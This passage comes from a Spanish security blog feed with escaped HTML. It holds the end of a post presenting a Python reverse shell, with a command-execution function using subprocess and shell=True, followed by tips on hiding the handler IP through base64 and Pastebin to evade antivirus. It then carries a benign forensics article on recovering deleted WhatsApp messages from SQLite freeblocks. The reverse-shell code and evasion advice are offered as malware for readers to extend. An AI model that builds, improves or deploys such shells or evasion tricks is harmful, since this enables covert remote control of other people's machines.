width: auto !important;&quot;&gt;&lt;div class=&quot;line number1 index0 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;&lt;span style=&quot;color: #006699; font-size: 1em; font-weight: bold; line-height: 1.1em;&quot;&gt;def&lt;/span&gt; run_cmd(data):&lt;br /&gt;&lt;span style=&quot;font-size: 1em; line-height: 1.1em;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; proc = subprocess.Popen(data,&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;shell=True,&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; stdout=subprocess.PIPE,&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;stderr=subprocess.PIPE,&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; stdin=subprocess.PIPE)&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; stdout = proc.stdout.read() + proc.stderr.read()&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; return stdout&lt;/div&gt;&lt;div class=&quot;line number2 index1 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;He utilizado subprocess para la ejecución de &quot;comandos&quot; en el sistema remoto. Estoy seguro que mas de uno esta pensando técnicas para mejorar la shell, implementar nuevos comandos, etc. Por ejemplo, la IP podría cogerla de un registro DNS, o de un recurso WEB publico, para evitar hardcodear (incrustar) la IP dentro del código fuente. Se recomienda, hardcodear en base64 la URL del recurso WEB para determinar la IP del &quot;handler&quot; y tratar de evitar la detección como malware por los antivirus (&lt;i&gt;Alguien se anima a mejorar la Shell implementando la obtención de la IP desde un recurso web publico como pastenBIN?&lt;/i&gt;)&lt;br /&gt;&lt;br /&gt;Compatible tanto en Windows como en Linux, se puede crear un ejecutable para Windows utilizando pyexe o pyinstaller.&lt;br /&gt;&lt;br /&gt;Es un &quot;shell&quot; muy simple pero efectiva. Os invito a probarla y comentar las limitaciones que tiene la Shell y como se podrían solventar!&lt;br /&gt;&lt;br /&gt;Por supuesto, os dejo como trabajo para casa, la creación del &quot;cliente&quot; que se conecta y maneja la conexión inversa con la shell .. xD&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;background-color: white; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;#ST2 #ST2Labs os desea:&lt;/div&gt;&lt;div style=&quot;background-color: white; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;border: none; font-size: small; list-style: circle inside; margin: 0px; outline: none; padding: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;border: none; color: #777777; font-family: Arial, &#39;Century gothic&#39;, sans-serif; list-style: circle inside; margin: 0px; outline: none; padding: 0px; text-align: start;&quot;&gt;¡¡¡FeliZ Navidad!!!&lt;/span&gt;&lt;span class=&quot;short_text&quot; id=&quot;result_box&quot; lang=&quot;en&quot; style=&quot;border: 0px; color: #777777; font-family: Arial, &#39;Century gothic&#39;, sans-serif; list-style: circle inside; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&amp;nbsp;- Merry Christmas -&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;short_text&quot; id=&quot;result_box&quot; lang=&quot;fr&quot; style=&quot;border: 0px; color: #777777; font-family: Arial, &#39;Century gothic&#39;, sans-serif; list-style: circle inside; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;Joyeux Noël -&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;short_text&quot; id=&quot;result_box&quot; lang=&quot;de&quot; style=&quot;border: 0px; color: #777777; font-family: Arial, &#39;Century gothic&#39;, sans-serif; list-style: circle inside; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;Frohe Weihnachten -&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;short_text&quot; id=&quot;result_box&quot; lang=&quot;ru&quot; style=&quot;border: 0px; color: #777777; font-family: Arial, &#39;Century gothic&#39;, sans-serif; list-style: circle inside; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;С Рождеством -&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;short_text&quot; id=&quot;result_box&quot; lang=&quot;zh-CN&quot; style=&quot;border: 0px; color: #777777; font-family: Arial, &#39;Century gothic&#39;, sans-serif; list-style: circle inside; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;圣诞节快乐 -&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;short_text&quot; id=&quot;result_box&quot; lang=&quot;it&quot; style=&quot;border: 0px; color: #777777; font-family: Arial, &#39;Century gothic&#39;, sans-serif; list-style: circle inside; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;Buon Natale -&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;short_text&quot; id=&quot;result_box&quot; lang=&quot;sv&quot; style=&quot;border: 0px; color: #777777; font-family: Arial, &#39;Century gothic&#39;, sans-serif; list-style: circle inside; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;God Jul -&lt;/span&gt;&lt;span class=&quot;short_text&quot; id=&quot;result_box&quot; lang=&quot;pt&quot; style=&quot;border: 0px; color: #777777; font-family: Arial, &#39;Century gothic&#39;, sans-serif; list-style: circle inside; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;Feliz Natal ...&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background-color: white; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;border: none; font-size: small; list-style: circle inside; margin: 0px; outline: none; padding: 0px;&quot;&gt;&lt;b&gt;&lt;span class=&quot;short_text&quot; lang=&quot;pt&quot; style=&quot;border: 0px; color: #777777; font-family: Arial, &#39;Century gothic&#39;, sans-serif; list-style: circle inside; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;@rhodius | @seguridadxato2 | @st2labs&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;[*] Basada en el código de&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.primalsecurity.net/0xc-python-tutorial-python-malware/?utm_content=bufferda5e8&amp;amp;utm_medium=social&amp;amp;utm_source=twitter.com&amp;amp;utm_campaign=buffer&quot; style=&quot;font-size: small;&quot; target=&quot;_blank&quot;&gt;primalsecurity&lt;/a&gt;&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2015/12/feliz-navidad-with-custom-python.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-qLr8Bdkb_B4/VnpsLAggJaI/AAAAAAAAd1o/zBuP7pkvJf4/s72-c/Feliz_Navidad.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-6240094681953259649</guid><pubDate>Wed, 16 Dec 2015 07:00:00 +0000</pubDate><atom:updated>2015-12-16T08:00:00.057+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">database</category><category domain="http://www.blogger.com/atom/ns#">DFIR</category><category domain="http://www.blogger.com/atom/ns#">dfslite</category><category domain="http://www.blogger.com/atom/ns#">dfsqlite3</category><category domain="http://www.blogger.com/atom/ns#">dftime</category><category domain="http://www.blogger.com/atom/ns#">Forensics</category><category domain="http://www.blogger.com/atom/ns#">sqlite</category><category domain="http://www.blogger.com/atom/ns#">tool</category><category domain="http://www.blogger.com/atom/ns#">Whatsapp</category><title>Digital Forensics of Android WhatsApp SQLite Database (Part III)</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-xCe-a_HSges/Vl7q2F0d9vI/AAAAAAAAd0c/bvksOH9iFLY/s1600/Whatsapp_p3_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;352&quot; src=&quot;http://3.bp.blogspot.com/-xCe-a_HSges/Vl7q2F0d9vI/AAAAAAAAd0c/bvksOH9iFLY/s640/Whatsapp_p3_st2labs.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;En este artículo abordaré la recuperación de mensajes borrado en la aplicación WhatsApp, como ya comente en la &lt;a href=&quot;http://www.seguridadparatodos.es/2015/11/digital-forensics-of-android-whatsapp.html&quot; target=&quot;_blank&quot;&gt;parte I&lt;/a&gt; y &lt;a href=&quot;http://www.seguridadparatodos.es/2015/12/digital-forensics-of-android-whatsapp-p2.html&quot; target=&quot;_blank&quot;&gt;II&lt;/a&gt;, la capacidad de recuperación de mensajes eliminados es inversamente proporcional al periodo de tiempo transcurrido desde que se produjo el hecho, así como a la intensidad de uso de la aplicación en dicho periodo.&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Es decir, cuanto mayor sea la intensidad y el tiempo transcurrido menor es la probabilidad de recuperar la información.&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Recuperando mensajes eliminados de WhatsApp - Recovery Data&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Si recordamos en la &lt;a href=&quot;http://www.seguridadparatodos.es/2015/12/digital-forensics-of-android-whatsapp-p2.html&quot; target=&quot;_blank&quot;&gt;segunda parte&lt;/a&gt;, el timestamp de un mensaje consta de 6 bytes y se encuentra justo a continuación de los datos, tal y como se puede ver en la siguiente imagen:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-gdAZE1qXCuo/Vl7QrGhinVI/AAAAAAAAdy0/T9EEd589TwM/s1600/Cell_data_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-gdAZE1qXCuo/Vl7QrGhinVI/AAAAAAAAdy0/T9EEd589TwM/s1600/Cell_data_st2labs.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;font-size: 12.8px;&quot;&gt;ST2Labs 13 - Cell Data to Offset 11358&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Pero antes de ponernos manos a la obra y decodificar el timestamp, se puede analizar la base de datos en busca de información eliminada, para ello, se deben de examinar el espacio sin utilizar (unallocated), los freeblock o incluso los freelist.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;En las base de datos SQLite, existe la posibilidad de indicar que un registro (cell record) ha sido eliminado marcando el mismo como &quot;freeblock&quot; dentro de una página, además si se elimina una página entera, se puede marcar como Freelist.&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;La información residual que queda en una base de datos cuando no se sigue el estándar, es aquella que es eliminada desde la aplicación (chat) y simplemente se elimina su &quot;indexación&quot; en la base de datos, es decir, en aquel espacio que no esta asignado a ninguna función &amp;nbsp;es denominado unallocated, y puede contener información que previamente ha sido eliminada, y que por tanto, no se encuentra indexada en la base de datos.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Por tanto resumiendo, la información eliminada puede estar ubicada en:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;- unallocated space&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;- freeblock&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;- freelist&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Además, si la base de datos es configurada con &quot;rollback&quot;, puede existir archivos WAL (Write-Ahead Log) o Journal, que permite guardar una copia de seguridad de una página mientras esta se esta modificando y no ha recibido un &quot;commit&quot;.&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-NDF58HUHV8c/Vl65rcY3YNI/AAAAAAAAdxU/zT3pEgTwg28/s1600/sqlite_page_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://2.bp.blogspot.com/-NDF58HUHV8c/Vl65rcY3YNI/AAAAAAAAdxU/zT3pEgTwg28/s320/sqlite_page_st2labs.png&quot; width=&quot;233&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Si existe el fichero db-wal o db-journal, es muy recomendable realizar un análisis forense de dichos archivos, en busca de información relevante. Si existen esto archivos, no se recomienda abrir la base de datos con un visor de SQLite, ya que puede ejecutar un &quot;commit&quot; pendiente y borrar por completo toda la información que pudiera contener.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;En nuestro caso, no disponemos de archivo db-wal, por lo que procedemos a analizar la información contenida en el archivo y que no esta consideraba como &quot;válida&quot;, es decir, analizaremos todos los freeblock, unallocated y freelist que existan.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Realizar esta tarea de forma manual es bastante tediosa, ya que para cada página se debe de extraer la información que existe entre la ultima &quot;celda - registro&quot; y el final de Cell Pointer Array (como recordáis del artículo anterior&quot;.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Pero además, puede exisitr espacio &quot;unallocated&quot; entre celdas, y /o freeblock (son aquellas celdas que han sido marcadas como disponibles) al realizar la acción de eliminar mensajes.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;u&gt;Vamos con un ejemplo:&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Abrimos la base de datos con un editor hexadecimal y analizamos el contenido de toda la página 3, ya que consideramos que es la más indicada al ser la que contiene la información de &quot;mensajes&quot;. Si se ha eliminado algún mensaje debe de ser de esta página.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Datos de interés para la página 3, según la información analizada en el articulo 2:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;- Offset page 3: 8192&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;- Ultima celda (registro) Offset: 11358&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;- Offset cell pointer: 8200&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;- Size Cell Pointer: 8 bytes&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Por tanto, el espacio &quot;unallocated&quot; entre la utlima celda (registro) y el final de Cell Pointer Array se puede calcular tal que así:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Ini unallocated Offset = 8208&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Size = 11358 - 8208 = &amp;nbsp;3150 bytes&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Con ayuda de un editor hexadecimal, se obtiene:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-TaMfdXXB3sA/Vl7gs-m4C1I/AAAAAAAAdzQ/TnHK8EOEVig/s1600/unallocated_space_p3_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;640&quot; src=&quot;http://4.bp.blogspot.com/-TaMfdXXB3sA/Vl7gs-m4C1I/AAAAAAAAdzQ/TnHK8EOEVig/s640/unallocated_space_p3_st2labs.png&quot; width=&quot;616&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;ST2Labs 14 - Unallocated database pace for page 3&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Se puede observar que existen varios mensajes como información residual en la página 3 de la base de datos, el &lt;b&gt;key_id (identificador único de cada mensaje) esta compuesto por un &quot;hash&quot; y un número de secuencia,&lt;/b&gt; además con el timestamp de los mensajes se puede realizar el timeline correspondiente.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Por ejemplo, se procede a analizar la información para el mensaje:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-xUrbFyTZBM4/Vl7isVQ0rDI/AAAAAAAAdzc/Q9p2fsor6i0/s1600/whatsapp_msg_st2labs_timestamp.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-xUrbFyTZBM4/Vl7isVQ0rDI/AAAAAAAAdzc/Q9p2fsor6i0/s1600/whatsapp_msg_st2labs_timestamp.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot;&gt;ST2Labs 15 - Recovery Delete Message - Whatsapp&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;No existe una forma normalizada de finalizar un mensaje, para calcular el tamaño exacto del mensaje, se debe de decodificar el cell header y el payloda header, sin embargo, para los datos que han sido eliminado (no están indexados) no se conoce el offset de los registro eliminados, por lo que no se puede a priori determinar el inicio de la celda, salvo mediante técnica de prueba y error.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Por ello, obtener el timetamp, es coger los 6 bytes seguido al final del mensaje, para el caso de ejemplo, acaba sin &quot;.&quot;, en otros casos puede que haya que probar más de una vez, por si el carácter &quot;.&quot; forma parte del mensaje de texto o no.&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;En nuestro caso de ejemplo:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Timestamp: 01513407d3f8&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Utilizando &lt;b&gt;DFTime&lt;/b&gt;, la herramienta para convertir el timestamp a Fecha y Hora, se obtiene:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-sltk8CZBdAM/Vl7k7-5jRhI/AAAAAAAAdzo/iv9YFhsQw_E/s1600/DFTime_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-sltk8CZBdAM/Vl7k7-5jRhI/AAAAAAAAdzo/iv9YFhsQw_E/s1600/DFTime_st2labs.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;ST2Labs 16 - DFTime - Timestamp converter tools&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Sin embargo, para asegurarse que no existe ningún otro mensaje eliminado disperso por la base de datos, se debe de analizar los freeblock dentro de la página 3.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;La información, si existen freeblock o no, se encuentra dentro de la cabecera de cada una de las páginas, con ayuda de la herramienta DFSLite, se puede consultar todas y cada una de las cabeceras de las páginas de la base de datos, con el comando -B.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-vmnFYXftcIg/Vl7mhwj-vaI/AAAAAAAAdz0/7GCyaCM4CGw/s1600/Header_freeblock_page_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-vmnFYXftcIg/Vl7mhwj-vaI/AAAAAAAAdz0/7GCyaCM4CGw/s1600/Header_freeblock_page_st2labs.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;ST2Labs 17 - Page header - freeblock&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Se analiza la información, y para la página 3 se detecta que existen 2 freeblock, donde el offset del primer freeblock es 3514 relativo a al offset de la página.&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Se utiliza DFSLite, con la opción -u para obtener la información contenida dentro de los freeblock, y unallocated, tal que:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-tiF8MNZhsAI/Vl7oT36UkuI/AAAAAAAAd0I/Bw7u16ckNIo/s1600/All_recovery_msg_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;422&quot; src=&quot;http://3.bp.blogspot.com/-tiF8MNZhsAI/Vl7oT36UkuI/AAAAAAAAd0I/Bw7u16ckNIo/s640/All_recovery_msg_st2labs.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;ST2Labs 18 - All messages recovery&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Se ha utilizado&lt;b&gt; strings&lt;/b&gt; para visualizar mejor los mensajes, pues la herramienta muestra la información en bruto (raw data). No obstante, para determinar el timestamp de los mensajes y montar un &quot;timeline&quot;, se debe de abrir el archivo en hexadecimal y analizar de forma manual, tal y como se ha visto en este artículo.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Para descubrir todos los mensajes se deberá de analizar todas las páginas de la base de datos, por tanto cuanto mayor sea la base de datos, mas elaborado y mayor será el tiempo que se tardará en obtener los resultados.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Espero que haya sido de utilidad, a continuación os dejo el enlace al repositorio donde voy subiendo las herramientas.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 